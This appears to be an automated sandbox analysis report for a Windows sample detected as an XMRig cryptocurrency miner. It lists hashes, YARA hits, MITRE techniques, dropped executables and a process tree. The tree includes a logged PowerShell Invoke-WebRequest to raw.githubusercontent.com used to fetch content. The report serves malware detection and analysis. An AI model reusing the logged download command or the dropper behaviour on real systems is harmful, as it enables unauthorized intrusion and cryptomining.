xmrig | 6842f294cadff5915789a6dfa171fd7d98160542cc4ebdd49e6a0a8f6f1b03b5

Analysis

max time kernel
95s
max time network
100s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
21/07/2024, 20:05

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

03352be648a9d144e555d7818de82cf0N.exe
Size

1.8MB
MD5

03352be648a9d144e555d7818de82cf0
SHA1

234e7823375e3906dc55ab821d8b91881ba33e3f
SHA256

6842f294cadff5915789a6dfa171fd7d98160542cc4ebdd49e6a0a8f6f1b03b5
SHA512

dd693eb9282758098d4d49bc0b154340b99a048dd80aba3570a9bfbd87654b23cacd670928a3b0f5bcc27ed9b0cbb7ffb6619a9c482db512da64b0ca3b8f7ab3
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82SIBG/cD:NABz

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 48 IoCs

miner

resource	yara_rule
behavioral2/memory/5000-62-0x00007FF6B6490000-0x00007FF6B6882000-memory.dmp	xmrig
behavioral2/memory/1084-88-0x00007FF75EDD0000-0x00007FF75F1C2000-memory.dmp	xmrig
behavioral2/memory/4292-95-0x00007FF601ED0000-0x00007FF6022C2000-memory.dmp	xmrig
behavioral2/memory/2412-100-0x00007FF719040000-0x00007FF719432000-memory.dmp	xmrig
behavioral2/memory/2812-439-0x00007FF73A3C0000-0x00007FF73A7B2000-memory.dmp	xmrig
behavioral2/memory/1336-440-0x00007FF6EE2D0000-0x00007FF6EE6C2000-memory.dmp	xmrig
behavioral2/memory/5064-442-0x00007FF7413F0000-0x00007FF7417E2000-memory.dmp	xmrig
behavioral2/memory/1372-444-0x00007FF6F6180000-0x00007FF6F6572000-memory.dmp	xmrig
behavioral2/memory/976-445-0x00007FF681900000-0x00007FF681CF2000-memory.dmp	xmrig
behavioral2/memory/928-443-0x00007FF6F9FF0000-0x00007FF6FA3E2000-memory.dmp	xmrig
behavioral2/memory/4864-438-0x00007FF6EDC80000-0x00007FF6EE072000-memory.dmp	xmrig
behavioral2/memory/364-114-0x00007FF7D4DB0000-0x00007FF7D51A2000-memory.dmp	xmrig
behavioral2/memory/208-113-0x00007FF782DD0000-0x00007FF7831C2000-memory.dmp	xmrig
behavioral2/memory/4936-111-0x00007FF6FC110000-0x00007FF6FC502000-memory.dmp	xmrig
behavioral2/memory/4360-110-0x00007FF75E7D0000-0x00007FF75EBC2000-memory.dmp	xmrig
behavioral2/memory/4940-107-0x00007FF709870000-0x00007FF709C62000-memory.dmp	xmrig
behavioral2/memory/3044-102-0x00007FF6180F0000-0x00007FF6184E2000-memory.dmp	xmrig
behavioral2/memory/5100-101-0x00007FF76CE40000-0x00007FF76D232000-memory.dmp	xmrig
behavioral2/memory/1108-87-0x00007FF6CA470000-0x00007FF6CA862000-memory.dmp	xmrig
behavioral2/memory/1132-41-0x00007FF6A5E80000-0x00007FF6A6272000-memory.dmp	xmrig
behavioral2/memory/4056-2522-0x00007FF7A5F00000-0x00007FF7A62F2000-memory.dmp	xmrig
behavioral2/memory/5036-2524-0x00007FF7B7150000-0x00007FF7B7542000-memory.dmp	xmrig
behavioral2/memory/1428-2525-0x00007FF7D3960000-0x00007FF7D3D52000-memory.dmp	xmrig
behavioral2/memory/2680-2568-0x00007FF676C30000-0x00007FF677022000-memory.dmp	xmrig
behavioral2/memory/4056-2572-0x00007FF7A5F00000-0x00007FF7A62F2000-memory.dmp	xmrig
behavioral2/memory/1108-2574-0x00007FF6CA470000-0x00007FF6CA862000-memory.dmp	xmrig
behavioral2/memory/1132-2578-0x00007FF6A5E80000-0x00007FF6A6272000-memory.dmp	xmrig
behavioral2/memory/1084-2577-0x00007FF75EDD0000-0x00007FF75F1C2000-memory.dmp	xmrig
behavioral2/memory/5036-2581-0x00007FF7B7150000-0x00007FF7B7542000-memory.dmp	xmrig
behavioral2/memory/5000-2584-0x00007FF6B6490000-0x00007FF6B6882000-memory.dmp	xmrig
behavioral2/memory/4292-2583-0x00007FF601ED0000-0x00007FF6022C2000-memory.dmp	xmrig
behavioral2/memory/2412-2586-0x00007FF719040000-0x00007FF719432000-memory.dmp	xmrig
behavioral2/memory/4936-2588-0x00007FF6FC110000-0x00007FF6FC502000-memory.dmp	xmrig
behavioral2/memory/5100-2596-0x00007FF76CE40000-0x00007FF76D232000-memory.dmp	xmrig
behavioral2/memory/208-2598-0x00007FF782DD0000-0x00007FF7831C2000-memory.dmp	xmrig
behavioral2/memory/4940-2591-0x00007FF709870000-0x00007FF709C62000-memory.dmp	xmrig
behavioral2/memory/3044-2595-0x00007FF6180F0000-0x00007FF6184E2000-memory.dmp	xmrig
behavioral2/memory/1428-2593-0x00007FF7D3960000-0x00007FF7D3D52000-memory.dmp	xmrig
behavioral2/memory/364-2600-0x00007FF7D4DB0000-0x00007FF7D51A2000-memory.dmp	xmrig
behavioral2/memory/4360-2602-0x00007FF75E7D0000-0x00007FF75EBC2000-memory.dmp	xmrig
behavioral2/memory/5064-2612-0x00007FF7413F0000-0x00007FF7417E2000-memory.dmp	xmrig
behavioral2/memory/928-2614-0x00007FF6F9FF0000-0x00007FF6FA3E2000-memory.dmp	xmrig
behavioral2/memory/1372-2616-0x00007FF6F6180000-0x00007FF6F6572000-memory.dmp	xmrig
behavioral2/memory/976-2618-0x00007FF681900000-0x00007FF681CF2000-memory.dmp	xmrig
behavioral2/memory/2812-2607-0x00007FF73A3C0000-0x00007FF73A7B2000-memory.dmp	xmrig
behavioral2/memory/2680-2610-0x00007FF676C30000-0x00007FF677022000-memory.dmp	xmrig
behavioral2/memory/4864-2609-0x00007FF6EDC80000-0x00007FF6EE072000-memory.dmp	xmrig
behavioral2/memory/1336-2605-0x00007FF6EE2D0000-0x00007FF6EE6C2000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	1236	powershell.exe
11	1236	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1236	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4056	BhZvIJG.exe
1108	wTrDMvR.exe
1084	jJsYBXN.exe
1132	hBekPIl.exe
5036	REAaeNe.exe
4292	YYCgYEv.exe
5000	xDjCCYi.exe
2412	jaRdrAN.exe
5100	CazJmhu.exe
3044	TidXAzy.exe
1428	HMEZjAx.exe
4940	AHjpCBM.exe
4936	vsSsMda.exe
4360	sLjUEoP.exe
208	jixDWEb.exe
364	AXewUzP.exe
2680	kCfiJlp.exe
4864	WtLDENg.exe
2812	OsBjOCb.exe
1336	pyKOPQa.exe
5064	sCRtOiC.exe
928	EGNnslR.exe
1372	bSalcIJ.exe
976	jtWywYI.exe
1972	wfmpmtf.exe
2780	ZwPqxgB.exe
3864	KSRJvCC.exe
2164	OGUGGYK.exe
624	eOqzKcI.exe
2004	NyjrRqm.exe
644	CaZHSQa.exe
4064	OhoZpqY.exe
2260	sIvIyPW.exe
1300	sFucQEf.exe
1988	MDqfuUz.exe
3328	OiEGVAB.exe
3780	TjmAmxG.exe
3652	NOvsqbp.exe
4184	EaaKvRX.exe
4964	gTpeVTd.exe
3904	fbmBdqM.exe
4228	uilLxqh.exe
3620	ZwWOvmh.exe
3860	SryHWYM.exe
1636	EIlaITh.exe
4388	YohyWpv.exe
2700	cGZsLRN.exe
732	Fnpeoga.exe
1724	YfdJsQI.exe
1748	QjQIGEb.exe
1172	ZSOjNTj.exe
3204	UxZzUNC.exe
4168	BZzmhRM.exe
4160	uFDSfNa.exe
2996	PkGZgGU.exe
5016	rRqmQbV.exe
2416	KwRdrQo.exe
2644	QSukXeJ.exe
2140	Cdpshtw.exe
3040	aysFoqc.exe
2440	nnjtwTQ.exe
3676	xshAnEd.exe
4868	IsBGYVb.exe
1912	CNbOEea.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3900-0-0x00007FF7F7360000-0x00007FF7F7752000-memory.dmp	upx
behavioral2/files/0x000700000002345b-7.dat	upx
behavioral2/files/0x0008000000023456-9.dat	upx
behavioral2/memory/4056-13-0x00007FF7A5F00000-0x00007FF7A62F2000-memory.dmp	upx
behavioral2/files/0x0007000000023460-37.dat	upx
behavioral2/files/0x0007000000023462-58.dat	upx
behavioral2/memory/5036-51-0x00007FF7B7150000-0x00007FF7B7542000-memory.dmp	upx
behavioral2/files/0x0007000000023461-48.dat	upx
behavioral2/memory/5000-62-0x00007FF6B6490000-0x00007FF6B6882000-memory.dmp	upx
behavioral2/files/0x0007000000023463-82.dat	upx
behavioral2/memory/1084-88-0x00007FF75EDD0000-0x00007FF75F1C2000-memory.dmp	upx
behavioral2/memory/4292-95-0x00007FF601ED0000-0x00007FF6022C2000-memory.dmp	upx
behavioral2/memory/2412-100-0x00007FF719040000-0x00007FF719432000-memory.dmp	upx
behavioral2/files/0x0007000000023467-105.dat	upx
behavioral2/files/0x0008000000023464-112.dat	upx
behavioral2/files/0x000700000002346a-131.dat	upx
behavioral2/files/0x000700000002346c-141.dat	upx
behavioral2/files/0x0007000000023473-168.dat	upx
behavioral2/files/0x0007000000023476-191.dat	upx
behavioral2/memory/2812-439-0x00007FF73A3C0000-0x00007FF73A7B2000-memory.dmp	upx
behavioral2/memory/1336-440-0x00007FF6EE2D0000-0x00007FF6EE6C2000-memory.dmp	upx
behavioral2/memory/5064-442-0x00007FF7413F0000-0x00007FF7417E2000-memory.dmp	upx
behavioral2/memory/1372-444-0x00007FF6F6180000-0x00007FF6F6572000-memory.dmp	upx
behavioral2/memory/976-445-0x00007FF681900000-0x00007FF681CF2000-memory.dmp	upx
behavioral2/memory/928-443-0x00007FF6F9FF0000-0x00007FF6FA3E2000-memory.dmp	upx
behavioral2/memory/4864-438-0x00007FF6EDC80000-0x00007FF6EE072000-memory.dmp	upx
behavioral2/files/0x0007000000023478-193.dat	upx
behavioral2/files/0x0007000000023477-188.dat	upx
behavioral2/files/0x0007000000023475-186.dat	upx
behavioral2/files/0x0007000000023474-181.dat	upx
behavioral2/files/0x0007000000023472-171.dat	upx
behavioral2/files/0x0007000000023471-166.dat	upx
behavioral2/files/0x0007000000023470-161.dat	upx
behavioral2/files/0x000700000002346f-156.dat	upx
behavioral2/files/0x000700000002346e-151.dat	upx
behavioral2/files/0x000700000002346d-146.dat	upx
behavioral2/files/0x000700000002346b-136.dat	upx
behavioral2/files/0x0008000000023465-123.dat	upx
behavioral2/memory/2680-117-0x00007FF676C30000-0x00007FF677022000-memory.dmp	upx
behavioral2/memory/364-114-0x00007FF7D4DB0000-0x00007FF7D51A2000-memory.dmp	upx
behavioral2/memory/208-113-0x00007FF782DD0000-0x00007FF7831C2000-memory.dmp	upx
behavioral2/memory/4936-111-0x00007FF6FC110000-0x00007FF6FC502000-memory.dmp	upx
behavioral2/memory/4360-110-0x00007FF75E7D0000-0x00007FF75EBC2000-memory.dmp	upx
behavioral2/memory/4940-107-0x00007FF709870000-0x00007FF709C62000-memory.dmp	upx
behavioral2/memory/3044-102-0x00007FF6180F0000-0x00007FF6184E2000-memory.dmp	upx
behavioral2/memory/5100-101-0x00007FF76CE40000-0x00007FF76D232000-memory.dmp	upx
behavioral2/files/0x0008000000023457-103.dat	upx
behavioral2/files/0x0007000000023469-98.dat	upx
behavioral2/files/0x0007000000023468-93.dat	upx
behavioral2/files/0x0007000000023466-89.dat	upx
behavioral2/memory/1108-87-0x00007FF6CA470000-0x00007FF6CA862000-memory.dmp	upx
behavioral2/memory/1428-80-0x00007FF7D3960000-0x00007FF7D3D52000-memory.dmp	upx
behavioral2/files/0x000700000002345f-61.dat	upx
behavioral2/memory/1132-41-0x00007FF6A5E80000-0x00007FF6A6272000-memory.dmp	upx
behavioral2/files/0x000700000002345e-39.dat	upx
behavioral2/files/0x000700000002345d-35.dat	upx
behavioral2/files/0x000700000002345c-21.dat	upx
behavioral2/files/0x000700000002345a-17.dat	upx
behavioral2/memory/4056-2522-0x00007FF7A5F00000-0x00007FF7A62F2000-memory.dmp	upx
behavioral2/memory/5036-2524-0x00007FF7B7150000-0x00007FF7B7542000-memory.dmp	upx
behavioral2/memory/1428-2525-0x00007FF7D3960000-0x00007FF7D3D52000-memory.dmp	upx
behavioral2/memory/2680-2568-0x00007FF676C30000-0x00007FF677022000-memory.dmp	upx
behavioral2/memory/4056-2572-0x00007FF7A5F00000-0x00007FF7A62F2000-memory.dmp	upx
behavioral2/memory/1108-2574-0x00007FF6CA470000-0x00007FF6CA862000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\wCxvdXS.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\GAjXNjF.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\WaKzXhk.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\pWoNugX.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\NuNVpDq.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\LtYjZBi.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\XLSptyo.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\RvGTaZg.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\yNCMAec.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\vCDFJvW.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\jPBBBit.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\qFmQFFQ.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\avxNBno.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\kEeDNnN.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\vCCFEjl.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\cGKzzMJ.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\lDPYpnT.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\YgXrmvV.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\wPasNpa.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\pYexkIX.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\gEjkfHW.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\TIaCHiC.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\FGjPmOQ.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\PPQRWuT.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\cyzmqAB.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\IcjMKLD.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\vBDLazm.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\nHSMLfh.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\ilzaHzX.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\WCnlDyT.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\UvSfwWA.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\GGiCKXo.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\BCXRjwE.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\OUkZvuE.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\SdRcemJ.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\KQRcfTw.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\xHUDHiP.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\zlztdyt.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\fqybXuP.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\YjCvlMS.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\lxNdnZL.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\NjOwjyN.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\EdfTSFp.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\sDggBmI.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\AABCgWc.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\dxyWgmx.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\EUDwwlw.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\YukVByB.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\POtbbsB.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\iUsksHw.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\rFECNJv.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\ypXgrTH.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\ElQnpQp.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\bxkySKr.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\ByKOLXQ.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\NkPKpWP.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\JKjJAwY.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\WUekFnz.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\pFWtPVt.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\LOwDadC.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\jXwqdCp.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\HmKeIPi.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\uzAaxfO.exe	03352be648a9d144e555d7818de82cf0N.exe
File created	C:\Windows\System\rJOMZSo.exe	03352be648a9d144e555d7818de82cf0N.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1236	powershell.exe
1236	powershell.exe
1236	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1236	powershell.exe
Token: SeLockMemoryPrivilege	3900	03352be648a9d144e555d7818de82cf0N.exe
Token: SeLockMemoryPrivilege	3900	03352be648a9d144e555d7818de82cf0N.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3900 wrote to memory of 1236	3900	03352be648a9d144e555d7818de82cf0N.exe	84
PID 3900 wrote to memory of 1236	3900	03352be648a9d144e555d7818de82cf0N.exe	84
PID 3900 wrote to memory of 4056	3900	03352be648a9d144e555d7818de82cf0N.exe	85
PID 3900 wrote to memory of 4056	3900	03352be648a9d144e555d7818de82cf0N.exe	85
PID 3900 wrote to memory of 1108	3900	03352be648a9d144e555d7818de82cf0N.exe	86
PID 3900 wrote to memory of 1108	3900	03352be648a9d144e555d7818de82cf0N.exe	86
PID 3900 wrote to memory of 1084	3900	03352be648a9d144e555d7818de82cf0N.exe	87
PID 3900 wrote to memory of 1084	3900	03352be648a9d144e555d7818de82cf0N.exe	87
PID 3900 wrote to memory of 1132	3900	03352be648a9d144e555d7818de82cf0N.exe	88
PID 3900 wrote to memory of 1132	3900	03352be648a9d144e555d7818de82cf0N.exe	88
PID 3900 wrote to memory of 5036	3900	03352be648a9d144e555d7818de82cf0N.exe	89
PID 3900 wrote to memory of 5036	3900	03352be648a9d144e555d7818de82cf0N.exe	89
PID 3900 wrote to memory of 4292	3900	03352be648a9d144e555d7818de82cf0N.exe	90
PID 3900 wrote to memory of 4292	3900	03352be648a9d144e555d7818de82cf0N.exe	90
PID 3900 wrote to memory of 2412	3900	03352be648a9d144e555d7818de82cf0N.exe	91
PID 3900 wrote to memory of 2412	3900	03352be648a9d144e555d7818de82cf0N.exe	91
PID 3900 wrote to memory of 5000	3900	03352be648a9d144e555d7818de82cf0N.exe	92
PID 3900 wrote to memory of 5000	3900	03352be648a9d144e555d7818de82cf0N.exe	92
PID 3900 wrote to memory of 5100	3900	03352be648a9d144e555d7818de82cf0N.exe	93
PID 3900 wrote to memory of 5100	3900	03352be648a9d144e555d7818de82cf0N.exe	93
PID 3900 wrote to memory of 3044	3900	03352be648a9d144e555d7818de82cf0N.exe	94
PID 3900 wrote to memory of 3044	3900	03352be648a9d144e555d7818de82cf0N.exe	94
PID 3900 wrote to memory of 1428	3900	03352be648a9d144e555d7818de82cf0N.exe	95
PID 3900 wrote to memory of 1428	3900	03352be648a9d144e555d7818de82cf0N.exe	95
PID 3900 wrote to memory of 4940	3900	03352be648a9d144e555d7818de82cf0N.exe	96
PID 3900 wrote to memory of 4940	3900	03352be648a9d144e555d7818de82cf0N.exe	96
PID 3900 wrote to memory of 4360	3900	03352be648a9d144e555d7818de82cf0N.exe	97
PID 3900 wrote to memory of 4360	3900	03352be648a9d144e555d7818de82cf0N.exe	97
PID 3900 wrote to memory of 4936	3900	03352be648a9d144e555d7818de82cf0N.exe	98
PID 3900 wrote to memory of 4936	3900	03352be648a9d144e555d7818de82cf0N.exe	98
PID 3900 wrote to memory of 208	3900	03352be648a9d144e555d7818de82cf0N.exe	99
PID 3900 wrote to memory of 208	3900	03352be648a9d144e555d7818de82cf0N.exe	99
PID 3900 wrote to memory of 364	3900	03352be648a9d144e555d7818de82cf0N.exe	100
PID 3900 wrote to memory of 364	3900	03352be648a9d144e555d7818de82cf0N.exe	100
PID 3900 wrote to memory of 2680	3900	03352be648a9d144e555d7818de82cf0N.exe	101
PID 3900 wrote to memory of 2680	3900	03352be648a9d144e555d7818de82cf0N.exe	101
PID 3900 wrote to memory of 4864	3900	03352be648a9d144e555d7818de82cf0N.exe	102
PID 3900 wrote to memory of 4864	3900	03352be648a9d144e555d7818de82cf0N.exe	102
PID 3900 wrote to memory of 2812	3900	03352be648a9d144e555d7818de82cf0N.exe	103
PID 3900 wrote to memory of 2812	3900	03352be648a9d144e555d7818de82cf0N.exe	103
PID 3900 wrote to memory of 1336	3900	03352be648a9d144e555d7818de82cf0N.exe	104
PID 3900 wrote to memory of 1336	3900	03352be648a9d144e555d7818de82cf0N.exe	104
PID 3900 wrote to memory of 5064	3900	03352be648a9d144e555d7818de82cf0N.exe	105
PID 3900 wrote to memory of 5064	3900	03352be648a9d144e555d7818de82cf0N.exe	105
PID 3900 wrote to memory of 928	3900	03352be648a9d144e555d7818de82cf0N.exe	106
PID 3900 wrote to memory of 928	3900	03352be648a9d144e555d7818de82cf0N.exe	106
PID 3900 wrote to memory of 1372	3900	03352be648a9d144e555d7818de82cf0N.exe	107
PID 3900 wrote to memory of 1372	3900	03352be648a9d144e555d7818de82cf0N.exe	107
PID 3900 wrote to memory of 976	3900	03352be648a9d144e555d7818de82cf0N.exe	108
PID 3900 wrote to memory of 976	3900	03352be648a9d144e555d7818de82cf0N.exe	108
PID 3900 wrote to memory of 1972	3900	03352be648a9d144e555d7818de82cf0N.exe	109
PID 3900 wrote to memory of 1972	3900	03352be648a9d144e555d7818de82cf0N.exe	109
PID 3900 wrote to memory of 2780	3900	03352be648a9d144e555d7818de82cf0N.exe	110
PID 3900 wrote to memory of 2780	3900	03352be648a9d144e555d7818de82cf0N.exe	110
PID 3900 wrote to memory of 3864	3900	03352be648a9d144e555d7818de82cf0N.exe	111
PID 3900 wrote to memory of 3864	3900	03352be648a9d144e555d7818de82cf0N.exe	111
PID 3900 wrote to memory of 2164	3900	03352be648a9d144e555d7818de82cf0N.exe	112
PID 3900 wrote to memory of 2164	3900	03352be648a9d144e555d7818de82cf0N.exe	112
PID 3900 wrote to memory of 624	3900	03352be648a9d144e555d7818de82cf0N.exe	113
PID 3900 wrote to memory of 624	3900	03352be648a9d144e555d7818de82cf0N.exe	113
PID 3900 wrote to memory of 2004	3900	03352be648a9d144e555d7818de82cf0N.exe	114
PID 3900 wrote to memory of 2004	3900	03352be648a9d144e555d7818de82cf0N.exe	114
PID 3900 wrote to memory of 644	3900	03352be648a9d144e555d7818de82cf0N.exe	115
PID 3900 wrote to memory of 644	3900	03352be648a9d144e555d7818de82cf0N.exe	115

C:\Users\Admin\AppData\Local\Temp\03352be648a9d144e555d7818de82cf0N.exe
"C:\Users\Admin\AppData\Local\Temp\03352be648a9d144e555d7818de82cf0N.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1236
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1236" "2968" "2160" "2972" "0" "0" "2976" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:12976
- C:\Windows\System\BhZvIJG.exe
  C:\Windows\System\BhZvIJG.exe
  2⤵
  - Executes dropped EXE
  PID:4056
- C:\Windows\System\wTrDMvR.exe
  C:\Windows\System\wTrDMvR.exe
  2⤵
  - Executes dropped EXE
  PID:1108
- C:\Windows\System\jJsYBXN.exe
  C:\Windows\System\jJsYBXN.exe
  2⤵
  - Executes dropped EXE
  PID:1084
- C:\Windows\System\hBekPIl.exe
  C:\Windows\System\hBekPIl.exe
  2⤵
  - Executes dropped EXE
  PID:1132
- C:\Windows\System\REAaeNe.exe
  C:\Windows\System\REAaeNe.exe
  2⤵
  - Executes dropped EXE
  PID:5036
- C:\Windows\System\YYCgYEv.exe
  C:\Windows\System\YYCgYEv.exe
  2⤵
  - Executes dropped EXE
  PID:4292
- C:\Windows\System\jaRdrAN.exe
  C:\Windows\System\jaRdrAN.exe
  2⤵
  - Executes dropped EXE
  PID:2412
- C:\Windows\System\xDjCCYi.exe
  C:\Windows\System\xDjCCYi.exe
  2⤵
  - Executes dropped EXE
  PID:5000
- C:\Windows\System\CazJmhu.exe
  C:\Windows\System\CazJmhu.exe
  2⤵
  - Executes dropped EXE
  PID:5100
- C:\Windows\System\TidXAzy.exe
  C:\Windows\System\TidXAzy.exe
  2⤵
  - Executes dropped EXE
  PID:3044
- C:\Windows\System\HMEZjAx.exe
  C:\Windows\System\HMEZjAx.exe
  2⤵
  - Executes dropped EXE
  PID:1428
- C:\Windows\System\AHjpCBM.exe
  C:\Windows\System\AHjpCBM.exe
  2⤵
  - Executes dropped EXE
  PID:4940
- C:\Windows\System\sLjUEoP.exe
  C:\Windows\System\sLjUEoP.exe
  2⤵
  - Executes dropped EXE
  PID:4360
- C:\Windows\System\vsSsMda.exe
  C:\Windows\System\vsSsMda.exe
  2⤵
  - Executes dropped EXE
  PID:4936
- C:\Windows\System\jixDWEb.exe
  C:\Windows\System\jixDWEb.exe
  2⤵
  - Executes dropped EXE
  PID:208
- C:\Windows\System\AXewUzP.exe
  C:\Windows\System\AXewUzP.exe
  2⤵
  - Executes dropped EXE
  PID:364
- C:\Windows\System\kCfiJlp.exe
  C:\Windows\System\kCfiJlp.exe
  2⤵
  - Executes dropped EXE
  PID:2680
- C:\Windows\System\WtLDENg.exe
  C:\Windows\System\WtLDENg.exe
  2⤵
  - Executes dropped EXE
  PID:4864
- C:\Windows\System\OsBjOCb.exe
  C:\Windows\System\OsBjOCb.exe
  2⤵
  - Executes dropped EXE
  PID:2812
- C:\Windows\System\pyKOPQa.exe
  C:\Windows\System\pyKOPQa.exe
  2⤵
  - Executes dropped EXE
  PID:1336
- C:\Windows\System\sCRtOiC.exe
  C:\Windows\System\sCRtOiC.exe
  2⤵
  - Executes dropped EXE
  PID:5064
- C:\Windows\System\EGNnslR.exe
  C:\Windows\System\EGNnslR.exe
  2⤵
  - Executes dropped EXE
  PID:928
- C:\Windows\System\bSalcIJ.exe
  C:\Windows\System\bSalcIJ.exe
  2⤵
  - Executes dropped EXE
  PID:1372
- C:\Windows\System\jtWywYI.exe
  C:\Windows\System\jtWywYI.exe
  2⤵
  - Executes dropped EXE
